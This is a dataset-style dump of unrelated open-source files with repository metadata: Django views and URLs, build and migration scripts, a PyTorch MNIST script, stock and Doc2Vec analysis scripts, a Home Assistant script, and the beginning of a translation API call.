with open('pageload.json') as d:
    for item in d:
        print("item:", item)
    #data = json.load(d)
# Create your views here.
def home_page(request):
return render(request, 'index.html')
def login_page(request):
form = LoginForm()
if request.method == 'POST':
form = LoginForm(request.POST)
if form.is_valid():
return render(request, 'index.html', {})
else:
return render(request, 'login.html', {'form': form})
if request.method == 'GET':
form = LoginForm(request.GET)
if form.is_valid():
            return render(request, 'index.html', {})
else:
return render(request, 'login.html', {'form': form})
def pageload(request):
f = open("pageload.json")
lines = f.readlines()
data = []
for v in lines:
d = json.loads(v)
data.append(d)
return render(request, 'pageload.html',{"data":data})
|
[
"adityasriram.b@gmail.com"
] |
adityasriram.b@gmail.com
|
37e2fadef932a626b9fd33bd0a3e0a3f1199ac99
|
c4116c2e8c411a9ab01065144e0e105f99f95313
|
/Database/SConscript.py
|
6f7f82bc564935887e976a0b307b7661ca9f0e26
|
[
"BSD-3-Clause"
] |
permissive
|
JeffersonLab/analyzer
|
aba8b4ce90b549b345daa81e731e44b0d704354b
|
a0613dcafa9efe42f759f5321cd0f8d2c633ba2f
|
refs/heads/master
| 2023-06-17T00:26:31.368749
| 2022-11-06T22:46:23
| 2022-11-06T22:46:23
| 13,133,237
| 9
| 61
|
BSD-3-Clause
| 2021-10-30T14:54:45
| 2013-09-26T20:14:27
|
C++
|
UTF-8
|
Python
| false
| false
| 504
|
py
|
###### Hall A Software database library SConscript Build File #####
from podd_util import build_library
Import('baseenv')
libname = 'PoddDB'
altname = 'Database'
src = """
Database.cxx
Textvars.cxx
VarType.cxx
"""
dbenv = baseenv.Clone()
dbenv.Replace(LIBS = [], RPATH=[])
# Database library
dblib = build_library(dbenv, libname, src,
extrahdrs = ['VarDef.h','Helper.h'],
dictname = altname,
versioned = True
)
|
[
"ole@jlab.org"
] |
ole@jlab.org
|
8eeaec3f066123a4a0d454dc2a40949cf1f173fc
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_dictaphone.py
|
b80b2eac1bb94e10625867c6415784904aae4379
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 399
|
py
|
#calss header
class _DICTAPHONE():
def __init__(self,):
self.name = "DICTAPHONE"
self.definitions = [u'a machine used in an office to record spoken words and later repeat them aloud so that they can be written down']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
737e6c3054715511afc3af4db17540ea8ce1dcf4
|
06c9faf8a8cf7b965a8be3c32d0d52fbd6b09d57
|
/ann.py
|
1266b3c1e7637b2757a8dd3efa1a2b17eec3536e
|
[] |
no_license
|
Chengchanghang/Pytorch
|
095672684d5c9e31be7fbc249cec5b2ae524e76c
|
0a5fdc82b857be12af5d22722872149be4433fc2
|
refs/heads/master
| 2021-07-05T19:16:15.593751
| 2017-10-01T13:54:11
| 2017-10-01T13:54:11
| 104,850,905
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,897
|
py
|
"""
View more, visit my tutorial page: https://morvanzhou.github.io/tutorials/
My Youtube Channel: https://www.youtube.com/user/MorvanZhou
Dependencies:
torch: 0.1.11
matplotlib
"""
import gzip
import pickle
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.data as Data
import torchvision  # dataset / vision utilities
import matplotlib.pyplot as plt
from torch.autograd import Variable
torch.manual_seed(1)  # reproducible
def vectorized_result(y):
z = np.zeros((10,))
z[y] = 1.0
return z
f = gzip.open('mnist.pkl.gz')
tr_d, va_d, te_d = pickle.load(f,encoding='bytes')
f.close()
training_inputs = [np.reshape(x, (784, )) for x in tr_d[0]]
training_results = [vectorized_result(y) for y in tr_d[1]]
traing_data = zip(training_inputs, training_results)
validation_inputs = [np.reshape(x, (784, )) for x in va_d[0]]
validation_data = zip(validation_inputs, va_d[1])
test_inputs = [np.reshape(x, (784, )) for x in te_d[0]]
test_data = zip(test_inputs, te_d[1])
tr_data = []
for x,y in traing_data:
x = torch.from_numpy(x)
xy = (x,y)
tr_data.append(xy)
class Net(torch.nn.Module):
def __init__(self, input_size=784,hidden_size=500,num_classes=10):
super(Net, self).__init__()
self.hidden = torch.nn.Linear(input_size, hidden_size)
self.predict = torch.nn.Linear(hidden_size,num_classes) # output layer
def forward(self, x):
x = F.relu(self.hidden(x)) # activation function for hidden layer
x = self.predict(x) # linear output
return x
net = Net() # define the network
print(net)
x,y = tr_data[1]
x = Variable(x)
b_y = torch.FloatTensor(y)
b_y = Variable(b_y)
optimizer = torch.optim.SGD(net.parameters(), lr=0.5)
loss_func = torch.nn.MSELoss()
|
[
"noreply@github.com"
] |
Chengchanghang.noreply@github.com
|
011fd1a9973de6c4af09cc8ab8ee1f8da121c33f
|
f646cf82090cba0139850dc6f4b5d978f2230f6c
|
/Fyyur-Website-Project-1/Study-SQL-and-Data-Modeling-for-the-Web/MigrationRay2/migrations/versions/22cb12ae1140_.py
|
bb60e2f6a33774d2dd17e788a862171c77181554
|
[] |
no_license
|
AmrElsersy/Full-Stack-Web-Nanodegree
|
7747ed6ed4e2e94d7b58d3f7f740e79568e31037
|
80fd0aec207420b9a0b907504402d9023f2d0d80
|
refs/heads/master
| 2023-04-16T23:59:58.939257
| 2020-07-17T00:16:58
| 2020-07-17T00:16:58
| 265,296,104
| 0
| 0
| null | 2021-05-06T20:20:11
| 2020-05-19T16:07:06
|
Python
|
UTF-8
|
Python
| false
| false
| 1,217
|
py
|
"""empty message
Revision ID: 22cb12ae1140
Revises: 6431fb45929f
Create Date: 2020-04-10 11:35:00.434018
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '22cb12ae1140'
down_revision = '6431fb45929f'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('study', sa.Column('id', sa.Integer(), nullable=True))
op.add_column('study', sa.Column('teacher_id', sa.Integer(), nullable=False))
op.drop_constraint('study_teacher.id_fkey', 'study', type_='foreignkey')
op.create_foreign_key(None, 'study', 'teacher', ['teacher_id'], ['id'])
op.drop_column('study', 'teacher.id')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('study', sa.Column('teacher.id', sa.INTEGER(), autoincrement=False, nullable=False))
op.drop_constraint(None, 'study', type_='foreignkey')
op.create_foreign_key('study_teacher.id_fkey', 'study', 'teacher', ['teacher.id'], ['id'])
op.drop_column('study', 'teacher_id')
op.drop_column('study', 'id')
# ### end Alembic commands ###
|
[
"amrelsersay@gmail.com"
] |
amrelsersay@gmail.com
|
f98ca3bf65ac7627757a4e80f0e7f1c903551a1a
|
b14ccf1330dddc9a2f6b481c1767b3200be92072
|
/contr6/urls.py
|
675b42246a5403b30d81fc05353af54c1e2a8a09
|
[] |
no_license
|
da5tan93/6_lab
|
e138df52c755c8ff5bddfb3f783b6d1954f39d8a
|
3f78a02618b5f0a26a6637ce58a8dd987f3db143
|
refs/heads/master
| 2020-07-29T22:16:01.319480
| 2019-09-21T13:11:59
| 2019-09-21T13:11:59
| 209,982,074
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,204
|
py
|
"""contr6 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from webapp.views import index_view, visitor_view, visitor_create_view, visitor_update_view, \
visitor_delete_view
urlpatterns = [
path('admin/', admin.site.urls),
path('', index_view, name='index'),
path('visitor/<int:pk>/', visitor_view, name='visitor_view'),
path('visitor/add/', visitor_create_view, name='visitor_add'),
path('visitor/<int:pk>/update/', visitor_update_view, name='visitor_update'),
path('visitor/<int:pk>/delete/', visitor_delete_view, name='visitor_delete'),
]
|
[
"dos5n@ya.ru"
] |
dos5n@ya.ru
|
34da0a797dfe842d60344fff363419bb1f40b7b6
|
c139820c3c8ed92ef575022fcfd40e9848913d53
|
/calculationm.py
|
d95dfe44a4c630088db76364cb0864f728870ccb
|
[] |
no_license
|
418011010/2020
|
d9116f693618ce6b0dad2f5a33c9f4b90d475552
|
983a4b771fa11fcc7a43c80db106a4faf156a6b5
|
refs/heads/master
| 2022-11-29T08:23:21.253682
| 2020-08-07T03:17:54
| 2020-08-07T03:17:54
| 263,866,870
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,718
|
py
|
#-*-coding:utf-8-*-
import numpy as np
from pandas import DataFrame
import pandas as pd
from sqlalchemy import create_engine
import pymysql
from tqdm import tqdm
import time
import mysql.connector
pymysql.install_as_MySQLdb()
# custom format conversion
def convert_currency(value):
    """
    Convert a string to float.
    Returns 0 if the conversion fails.
    """
    try:
        return np.float(value)
    except Exception:
        return 0
ce = create_engine("mysql+mysqlconnector://root:coship@localhost:3306/stock", encoding='utf-8')
tabsql = "show tables"
dmtables = pd.read_sql_query(tabsql, con=ce)
tables = dmtables['Tables_in_stock'].values.tolist()
#print(np.array(tables))
tables.remove('stname')
tables.remove('stock_sh.000001')
tables.remove('stock_sh.000002')
tables.remove('stock_sh.000003')
tables.remove('stock_sz.399001')
sql1 = "SELECT date,code,pctChg FROM `stock_sh.000001`"
data1 = pd.read_sql_query(sql1, con=ce)
sql2 = "SELECT date,code,pctChg FROM `stock_sz.399001`"
data2 = pd.read_sql_query(sql2, con=ce)
data2['pctChg'] = data2['pctChg'].apply(convert_currency)
#print(data2.dtypes)
pbar = tqdm(tables)
for t in pbar:
pbar.set_description("processing %s" % t)
#print(t)
if t[7] == 'h':
sql3 = "SELECT date,code,pctChg FROM `%s`" % t
data3 = pd.read_sql_query(sql3, con=ce)
data3['pctChg'] = data3['pctChg'].apply(convert_currency)
comb = pd.concat([data1, data3], axis=1, join='inner', ignore_index=True)
comb = comb.drop_duplicates().T.drop_duplicates().T
comb['v'] = 0
comb.loc[(comb[2] <= 0) & (comb.loc[:, 5] >= 3), ['v']] = 1
if comb['v'].sum() >= 30:
print(t)
print(comb['v'].sum())
elif t[7] == 'z':
sql4 = "SELECT date,code,pctChg FROM `%s`" % t
data4 = pd.read_sql_query(sql4, con=ce)
data4['pctChg'] = data4['pctChg'].apply(convert_currency)
comb = pd.concat([data2, data4], axis=1, join='inner', ignore_index=True)
comb = comb.drop_duplicates().T.drop_duplicates().T
comb['v'] = 0
comb.loc[(comb[2] <= 0) & (comb.loc[:, 5] >= 3), ['v']] = 1
if comb['v'].sum() >= 30:
print(t)
print(comb['v'].sum())
# # concatenation
# sql3 = "SELECT date,code,pctChg FROM `stock_sh.600004`"
# data3 = pd.read_sql_query(sql3, con=ce)
# data3['pctChg'] = data3['pctChg'].astype(np.float64)
# #print(data3)
# comb = pd.concat([data2, data3], axis=1, join='inner', ignore_index=True)
# comb = comb.drop_duplicates().T.drop_duplicates().T
# comb['vv'] = 0
# comb.loc[(comb[2] >= 2) & (comb.loc[:, 5] >= 3), ['vv']] = 1
# print(comb['vv'].sum())
# print(comb.loc[(comb.loc[:, 2] >= 2) & (comb.loc[:, 5] >= 3)])
|
[
"418011010@qq.com"
] |
418011010@qq.com
|
0f1c79040c8c98280ff6bb41dd29ca5438094195
|
ac6373b39ef103d0e605c365a53c609fd6c72a36
|
/packages/@aws-cdk/custom-resources/test/provider-framework/integration-test-fixtures/s3-assert-handler/index.py
|
a5e9321c895eaa568537476739dee95fbdd04ab4
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
joeykilpatrick/aws-cdk
|
7810fb4576ab7b8ff44587f75ffc0676d7b4808f
|
92fb853ea7d31e7bf3d60bd50ce18b95c4189da6
|
refs/heads/master
| 2021-05-25T17:43:49.463556
| 2020-04-07T09:59:07
| 2020-04-07T09:59:07
| 253,850,929
| 2
| 0
|
Apache-2.0
| 2020-04-07T16:28:26
| 2020-04-07T16:28:25
| null |
UTF-8
|
Python
| false
| false
| 922
|
py
|
import boto3
s3 = boto3.client('s3')
def on_event(event, ctx):
print(event)
def is_complete(event, ctx):
print(event)
# nothing to assert if this resource is being deleted
if event['RequestType'] == 'Delete':
return { 'IsComplete': True }
props = event['ResourceProperties']
bucket_name = props['BucketName']
object_key = props['ObjectKey']
expected_content = props['ExpectedContent']
print("reading content from s3://%s/%s" % (bucket_name, object_key))
content = None
try:
result = s3.get_object(Bucket=bucket_name, Key=object_key)
content = result['Body'].read().decode('utf-8')
except s3.exceptions.NoSuchKey:
print("file not found")
pass
print("actual content: %s" % content)
print("expected content: %s" % expected_content)
is_equal = content == expected_content
if is_equal:
print("s3 content matches expected")
return { 'IsComplete': is_equal }
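# Illustrative is_complete() event, built only from the fields the handler
# reads above (bucket, key and content values are made up):
# {
#     "RequestType": "Create",
#     "ResourceProperties": {
#         "BucketName": "my-test-bucket",
#         "ObjectKey": "expected.txt",
#         "ExpectedContent": "hello"
#     }
# }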
|
[
"37929162+mergify[bot]@users.noreply.github.com"
] |
37929162+mergify[bot]@users.noreply.github.com
|
39df28df03435665a7bf280677b4063988e5ad01
|
c5712ae1d10f36e1daf450d45e0b6c8728f3bee9
|
/APIMV/wsgi.py
|
28d5f09bc989dce5e01837b3e1c7f4eca4361c67
|
[] |
no_license
|
SalvadorLopezGomez/moviles_tercer_corte_api
|
fbaeb2833c1f078213f2129685875a6ffab7df9b
|
79372dad80054b55139e775c33d11472e269fb1b
|
refs/heads/master
| 2022-04-14T11:48:35.148048
| 2020-04-07T08:32:13
| 2020-04-07T08:32:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 387
|
py
|
"""
WSGI config for APIMV project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'APIMV.settings')
application = get_wsgi_application()
|
[
"153192@ids.upchiapas.edu.mx"
] |
153192@ids.upchiapas.edu.mx
|
9ee138622ad76dee330ccb93bd22a7d9a93ce566
|
25d69136cadc3755200160f9005ed17bb13409b8
|
/django_1.5/lib/python2.7/site-packages/django_extensions/management/commands/print_user_for_session.py
|
695c050bd8a2ceb8d5ee0834e810d6e9b69b9cdd
|
[] |
no_license
|
davidmfry/Django_Drag_and_Drop_v1
|
4cc89e767c11313451c77dee6cd206a5ee724b8d
|
5ec9c99acb127c04a241eb81d3df16533b4ce96f
|
refs/heads/master
| 2016-09-03T06:52:52.925510
| 2013-08-12T21:48:33
| 2013-08-12T21:48:33
| 12,006,953
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,688
|
py
|
from django.core.management.base import BaseCommand, CommandError
from django.contrib.auth.models import User
from django.contrib.sessions.models import Session
import re
SESSION_RE = re.compile("^[0-9a-f]{20,40}$")
class Command(BaseCommand):
help = ("print the user information for the provided session key. "
"this is very helpful when trying to track down the person who "
"experienced a site crash.")
args = "session_key"
label = 'session key for the user'
requires_model_validation = True
can_import_settings = True
def handle(self, *args, **options):
if len(args) > 1:
raise CommandError("extra arguments supplied")
if len(args) < 1:
raise CommandError("session_key argument missing")
key = args[0].lower()
if not SESSION_RE.match(key):
raise CommandError("malformed session key")
try:
session = Session.objects.get(pk=key)
except Session.DoesNotExist:
print("Session Key does not exist. Expired?")
return
data = session.get_decoded()
print('Session to Expire: %s' % session.expire_date)
print('Raw Data: %s' % data)
uid = data.get('_auth_user_id', None)
if uid is None:
print('No user associated with session')
return
print("User id: %s" % uid)
try:
user = User.objects.get(pk=uid)
except User.DoesNotExist:
print("No user associated with that id.")
return
for key in ['username', 'email', 'first_name', 'last_name']:
print("%s: %s" % (key, getattr(user, key)))
|
[
"david.fry.tv@gmail.com"
] |
david.fry.tv@gmail.com
|
ecc1d9c5b96ad1abb4fd71a03dabb273bc0e097f
|
d14b2593bad813163e8f2dd5f8996d036ae5576e
|
/DOC2Vec.py
|
eab8d0d53bfaa47fee0826018f3e0c7c54afab99
|
[] |
no_license
|
anbaee/my-P.hD-Code
|
36f1f9c84249d98842cbcec1be0c6a9a1adffd1f
|
a61360aadd4269014af32836c0cc3297fca921a8
|
refs/heads/master
| 2021-06-25T00:05:47.965826
| 2021-01-22T05:31:38
| 2021-01-22T05:31:38
| 199,577,199
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,935
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 29 06:58:39 2020
@author: Novin
"""
import pandas as pd
from gensim.test.utils import common_texts
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
from sklearn.metrics import accuracy_score, f1_score
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn import utils
from sklearn import svm
import csv
from tqdm import tqdm
import multiprocessing
import nltk
from nltk.corpus import stopwords
import numpy as np
from sklearn.svm import SVC
from sklearn.metrics import confusion_matrix,classification_report
import time
def tokenize_text(text):
tokens = []
for sent in nltk.sent_tokenize(text):
for word in nltk.word_tokenize(sent):
if len(word) < 2:
continue
tokens.append(word.lower())
return tokens
tqdm.pandas(desc="progress-bar")
# Initializing the variables
df = pd.read_csv('CF output - Copy.csv')
tags_index = {'down': 1 , 'up': 2}
y = df['label60']
data = []
for rowIndex,row in df.iterrows():
x = tokenize_text(str(row['title']) + str(row['articleBody']))
print(tags_index[row['label60']])
data.append(TaggedDocument(words = x , tags = [tags_index[row['label60']]]))
train_documents, test_documents, y_train, y_test = train_test_split(data, y, test_size=0.2)
# Prepare and train the Doc2Vec model
cores = multiprocessing.cpu_count()
# NOTE: despite the _dbow suffix, dm=1 selects the PV-DM architecture (dm=0 would be DBOW)
model_dbow = Doc2Vec(dm=1, vector_size=210, negative=5, hs=0, min_count=3, sample = 0, workers=cores, alpha=0.025, min_alpha=0.001)
model_dbow.build_vocab([x for x in tqdm(train_documents)])
#train_documents = utils.shuffle(train_documents)
model_dbow.train(train_documents,total_examples=len(train_documents), epochs=30)
def vector_for_learning(model, input_docs):
sents = input_docs
targets, feature_vectors = zip(*[(doc.tags[0], model.infer_vector(doc.words, steps=20)) for doc in sents])
return targets, feature_vectors
model_dbow.save('./forexModel.d2v')
y_train, X_train = vector_for_learning(model_dbow, train_documents)
y_test, X_test = vector_for_learning(model_dbow, test_documents)
clf = svm.SVC(random_state=42 , gamma = 'auto')
print("Default Parameters are: \n",clf.get_params)
start_time = time.time()
clf.fit(X_train, y_train)
fittime = time.time() - start_time
print("Time consumed to fit model: ",time.strftime("%H:%M:%S", time.gmtime(fittime)))
start_time = time.time()
score=clf.score(X_test, y_test)
print("Accuracy: ",score)
y_pred = clf.predict(X_test)
scoretime = time.time() - start_time
print("Time consumed to score: ",time.strftime("%H:%M:%S", time.gmtime(scoretime)))
case1=[score,fittime,scoretime]
print(confusion_matrix(y_test,y_pred))
print(classification_report(y_test,y_pred))
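# A minimal inference sketch for the saved model (commented out so the
# script's behavior is unchanged; the sample headline is hypothetical and
# 'steps' mirrors the inference setting used above):
# loaded = Doc2Vec.load('./forexModel.d2v')
# vec = loaded.infer_vector(tokenize_text('EURUSD rallies on ECB news'), steps=20)
# print(clf.predict([vec]))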
|
[
"noreply@github.com"
] |
anbaee.noreply@github.com
|
0701ad1ecfb95fdccd9375d3d3a6e07fe46f47a7
|
a42c5a34aaabe8bc04bfd4104d16f7ca74afd733
|
/numba_ized_split_1024_1/RFMC_stacking.py
|
2311a4056e897f1a4f7e1e739c8ce1ef282d45b1
|
[] |
no_license
|
devkimg1/spin-glass-order
|
ab06e708a399f380ff303125785b47c507783673
|
3b49327b3308a94983e5fb5aee7abd29d9ddbde1
|
refs/heads/main
| 2023-04-21T00:37:53.442564
| 2021-05-20T13:12:17
| 2021-05-20T13:12:17
| 330,023,721
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,054
|
py
|
'''
'''
import numpy as np
import pickle
import os
class RFMC():
    # class-level defaults (the original used bare annotations such as
    # "model: None", which do not actually create the attributes)
    model = None
    energy_series = None
    time_series = None
    steps = 0
def __init__(self, model):
self.model = model
self.rng = np.random.default_rng()
#self.energy_series = np.empty(1,dtype='int')
#self.time_series = np.empty(1,dtype='float')
self.steps = 0
self.next_run_number = 0
if not os.path.exists(('runs/%dx%d_%1.2f'%(self.model.n_x,self.model.n_y,self.model.T)).replace('.','-')):
os.makedirs(('runs/%dx%d_%1.2f'%(self.model.n_x,self.model.n_y,self.model.T)).replace('.','-'))
def run(self, steps):
steps = int(steps)
energy_series = np.zeros(steps)
time_series = np.zeros(steps)
# The iterations ignore the first state. This is an arbitrary choice
for i in range(steps):
self.steps += 1
step = self.move_selection()
self.model.glass_update(step)
self.model.energy_update(step)
self.model.probability_update(step)
time_series[i] = self.time_calculation(self.model.rate())
energy_series[i] = self.model._energy
pickle.dump(energy_series,open(('runs/%dx%d_%1.2f/energy_%d'%(self.model.n_x,self.model.n_y,self.model.T,self.next_run_number)).replace('.','-')+'.p','wb'))
pickle.dump(time_series,open(('runs/%dx%d_%1.2f/time_%d'%(self.model.n_x,self.model.n_y,self.model.T,self.next_run_number)).replace('.','-')+'.p','wb'))
        self.next_run_number += 1
        # keep the latest series on the instance so get_mean()/get_sus() have data
        self.energy_series = energy_series
        self.time_series = time_series
        return
def move_selection(self):
return self.model.move_selection()
def time_calculation(self, rate):
return -np.log(self.rng.uniform())/rate
    def get_mean(self):
        # time-weighted average energy; np.dot of two 1-D arrays is already a scalar
        return np.dot(self.energy_series, self.time_series) / np.sum(self.time_series)
    def get_sus(self):
        mean = self.get_mean()
        # the original referenced an undefined self.e2_series; the squared
        # energy series is the evident intent here
        m2 = np.sum(self.time_series * self.energy_series**2) / np.sum(self.time_series)
        return (m2 - mean**2) / self.model.T**2
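# Minimal usage sketch (the `model` argument is assumed to expose n_x, n_y,
# T, move_selection(), glass_update(), energy_update(), probability_update()
# and rate(), matching the calls above):
# mc = RFMC(model)
# mc.run(1e5)           # writes energy_*/time_* pickles under runs/
# print(mc.get_mean())  # time-weighted mean energy of the last run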
|
[
"devkimg1@gmail.com"
] |
devkimg1@gmail.com
|
69f9b23509152d698020e0cd3642f5f72426c14a
|
679fe3e21889a7f0cee2ab0caa9901859f756a82
|
/python_scripts/get_temp.py
|
a872a02fa141a36605eac8fc614cb94bff05fcde
|
[] |
no_license
|
pasoad/home-assistant-config
|
d5a1e059f6842bc39771bf98cfdb58bf383d98f1
|
8abfea21637878c946495196f98ab2e1f58251ac
|
refs/heads/main
| 2023-02-14T01:37:57.761610
| 2021-01-12T21:35:06
| 2021-01-12T21:35:06
| 314,674,147
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,268
|
py
|
########################################################
### get temp for a room (default: home) ###
### Parameters: ###
### {"entity_id": "cuisine"} ###
########################################################
entity_id = data.get('entity_id').replace(' ', '_').replace('é', 'e').replace('è', 'e')
logger.error("entity_id " + entity_id)
if entity_id:
if entity_id == "dehors":
temp = hass.states.get("sensor.outdoor_temperature").state
service_data = {"text":"Il fait " + temp + " dehors"}
hass.services.call('snips', 'say', service_data)
elif (hass.states.get("sensor."+entity_id) and hass.states.get("sensor."+entity_id).state):
temp = hass.states.get("sensor."+entity_id).state
service_data = {"text":"Il fait " + temp + " dans " + entity_id}
hass.services.call('snips', 'say', service_data)
else:
service_data = {"text":"Impossible de trouver la température de " + data.get('entity_id') + "'"}
hass.services.call('snips', 'say', service_data)
else:
temp = hass.states.get("sensor.current_temperature").state
service_data = {"text":"Il fait " + temp + " degrès dans la maison"}
hass.services.call('snips', 'say', service_data)
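# A hypothetical Home Assistant automation snippet invoking this script
# (the service name follows from the file path python_scripts/get_temp.py):
#   service: python_script.get_temp
#   data: {"entity_id": "cuisine"}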
|
[
"root@core-ssh.local.hass.io"
] |
root@core-ssh.local.hass.io
|
2301371acf5e18404b4319b791c4a0680e2e82d7
|
9a9af1ccf2e09e53cf52653ad778c0585194d59a
|
/LoadData.py
|
ff91c1479d0d0a09e04d4c5a2e095ebc59528094
|
[] |
no_license
|
weiweijiuzaizhe/neural_factorization_machine
|
1ff28589a2e2a56804a5c4a037ba3c97b51d547d
|
34d3bae1e6e1acfb3015fa8fa0cebefcc5c33553
|
refs/heads/master
| 2021-01-23T02:40:56.766886
| 2017-09-05T06:43:02
| 2017-09-05T06:43:02
| 102,442,242
| 1
| 0
| null | 2017-09-05T06:21:35
| 2017-09-05T06:21:35
| null |
UTF-8
|
Python
| false
| false
| 4,555
|
py
|
'''
Utilities for Loading data.
The input data file follows the same input for LibFM: http://www.libfm.org/libfm-1.42.manual.pdf
@author:
Xiangnan He (xiangnanhe@gmail.com)
Lizi Liao (liaolizi.llz@gmail.com)
@references:
'''
import numpy as np
import os
class LoadData(object):
'''given the path of data, return the data format for DeepFM
:param path
return:
Train_data: a dictionary, 'Y' refers to a list of y values; 'X' refers to a list of features_M dimension vectors with 0 or 1 entries
Test_data: same as Train_data
Validation_data: same as Train_data
'''
# Three files are needed in the path
def __init__(self, path, dataset, loss_type):
self.path = path + dataset + "/"
self.trainfile = self.path + dataset +".train.libfm"
self.testfile = self.path + dataset + ".test.libfm"
self.validationfile = self.path + dataset + ".validation.libfm"
self.features_M = self.map_features( )
self.Train_data, self.Validation_data, self.Test_data = self.construct_data( loss_type )
def map_features(self): # map the feature entries in all files, kept in self.features dictionary
self.features = {}
self.read_features(self.trainfile)
self.read_features(self.testfile)
self.read_features(self.validationfile)
#print("features_M:", len(self.features))
return len(self.features)
def read_features(self, file): # read a feature file
f = open( file )
line = f.readline()
i = len(self.features)
while line:
items = line.strip().split(' ')
for item in items[1:]:
if item not in self.features:
self.features[ item ] = i
i = i + 1
line = f.readline()
f.close()
def construct_data(self, loss_type):
X_, Y_ , Y_for_logloss= self.read_data(self.trainfile)
if loss_type == 'log_loss':
Train_data = self.construct_dataset(X_, Y_for_logloss)
else:
Train_data = self.construct_dataset(X_, Y_)
print("# of training:" , len(Y_))
X_, Y_ , Y_for_logloss= self.read_data(self.validationfile)
if loss_type == 'log_loss':
Validation_data = self.construct_dataset(X_, Y_for_logloss)
else:
Validation_data = self.construct_dataset(X_, Y_)
print("# of validation:", len(Y_))
X_, Y_ , Y_for_logloss = self.read_data(self.testfile)
if loss_type == 'log_loss':
Test_data = self.construct_dataset(X_, Y_for_logloss)
else:
Test_data = self.construct_dataset(X_, Y_)
print("# of test:", len(Y_))
return Train_data, Validation_data, Test_data
    def read_data(self, file):
        # read a data file. For a row, the first column goes into Y_;
        # the other columns become a row in X_ and entries are mapped to indexes in self.features
f = open( file )
X_ = []
Y_ = []
Y_for_logloss = []
line = f.readline()
while line:
items = line.strip().split(' ')
Y_.append( 1.0*float(items[0]) )
if float(items[0]) > 0:# > 0 as 1; others as 0
v = 1.0
else:
v = 0.0
Y_for_logloss.append( v )
X_.append( [ self.features[item] for item in items[1:]] )
line = f.readline()
f.close()
return X_, Y_, Y_for_logloss
def construct_dataset(self, X_, Y_):
Data_Dic = {}
X_lens = [ len(line) for line in X_]
indexs = np.argsort(X_lens)
Data_Dic['Y'] = [ Y_[i] for i in indexs]
Data_Dic['X'] = [ X_[i] for i in indexs]
return Data_Dic
def truncate_features(self):
"""
Make sure each feature vector is of the same length
"""
num_variable = len(self.Train_data['X'][0])
        for i in range(len(self.Train_data['X'])):
            num_variable = min([num_variable, len(self.Train_data['X'][i])])
        # truncate train, validation and test
        for i in range(len(self.Train_data['X'])):
            self.Train_data['X'][i] = self.Train_data['X'][i][0:num_variable]
        for i in range(len(self.Validation_data['X'])):
            self.Validation_data['X'][i] = self.Validation_data['X'][i][0:num_variable]
        for i in range(len(self.Test_data['X'])):
            self.Test_data['X'][i] = self.Test_data['X'][i][0:num_variable]
return num_variable
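# Minimal usage sketch (hypothetical path/dataset names; expects
# <path><dataset>/<dataset>.{train,test,validation}.libfm to exist):
# data = LoadData('../data/', 'frappe', 'square_loss')
# print(data.features_M, len(data.Train_data['Y']))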
|
[
"tonyfd26@foxmail.com"
] |
tonyfd26@foxmail.com
|
1f817c1a4c68aded1a7453d94d21585b9cfcf484
|
2bdedcda705f6dcf45a1e9a090377f892bcb58bb
|
/src/main/output/lot/reason_right_java_home_group/nano/back/friend/eye_woman.py
|
80dd2dbabd5e68ad4e9304971d2c2c0ec2b44984
|
[] |
no_license
|
matkosoric/GenericNameTesting
|
860a22af1098dda9ea9e24a1fc681bb728aa2d69
|
03f4a38229c28bc6d83258e5a84fce4b189d5f00
|
refs/heads/master
| 2021-01-08T22:35:20.022350
| 2020-02-21T11:28:21
| 2020-02-21T11:28:21
| 242,123,053
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,144
|
py
|
# -*- coding: utf-8 -*-
import http.client, urllib.parse
# **********************************************
# *** Update or verify the following values. ***
# **********************************************
# Replace the subscriptionKey string value with your valid subscription key.
host = 'api.microsofttranslator.com'
path = '/V2/Http.svc/TranslateArray'
params = ''
ns = "http://schemas.microsoft.com/2003/10/Serialization/Arrays";
# NOTE: AppId is required, but it can be empty because we are sending the Ocp-Apim-Subscription-Key header.
body = """
<TranslateArrayRequest>
<AppId />
<Texts>
